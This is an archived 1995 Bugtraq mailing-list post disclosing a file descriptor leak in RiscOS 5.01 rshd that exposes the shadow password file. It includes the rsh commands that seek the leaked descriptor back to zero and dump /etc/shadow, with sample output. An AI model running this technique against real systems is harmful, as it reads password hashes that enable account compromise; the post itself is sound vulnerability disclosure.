Bugtraq mailing list archives
BUG (and exploit): RiscOS 5.01 rshd has FD leaks...
From: jeremy () suede sw oz au (Jeremy Fitzhardinge)
Date: Fri, 11 Aug 1995 16:20:33 -0500
Hi all, When rsh'ing to a RiscOS 5.01 machine, the process being run has a file descriptor open RO on the shadow password file. A simple program to seek it back to 0 and copy will reveal the encrypted passwords to anyone who can rsh to the machine. suite is a Mips RiscOS 5.01 machine; suede is a Solaris box : suite:4; ls -li /etc/shadow 4409 -r-------- 1 root 4072 Aug 11 08:48 /etc/shadow : suede:21; rsh suite t/openfd 21 Dev (33, 0), ino 2679, type character special 20 Dev (33, 0), ino 2679, type character special 8 Dev (255, 255), ino 13566, type FIFO 7 Dev (33, 0), ino 4409, type regular file ***** 4 Dev (33, 0), ino 4409, type regular file ***** 2 Dev (255, 255), ino 13566, type FIFO 1 Dev (0, 0), ino 0, type Unknown Numeric type: 0 0 Dev (0, 0), ino 0, type Unknown Numeric type: 0 (seek0 just seeks its stdin to offset 0) : suede:21; rsh suite '(t/seek0; cat)</dev/fd/7' root:oHnoyOuDOnt:9334:::::: setup:*NOLOGIN*:8603:::::: sysadm:*NOLOGIN*:8603:::::: daemon:*NOLOGIN*:8603:::::: bin:*NOLOGIN*:8603:::::: ... I'm curious about the pipes as well; what are they to? I think the "unknown" file descriptors are sockets; fstat doesn't seem to cope with them. J
Current thread:
- local mail delivery der Mouse (Aug 03)
- Re: local mail delivery Neil Woods (Aug 03)
- Goings on with Web clients System Administrator (Aug 04)
- Re: Goings on with Web clients Zygo Blaxell (Aug 09)
- BUG (and exploit): RiscOS 5.01 rshd has FD leaks... Jeremy Fitzhardinge (Aug 11)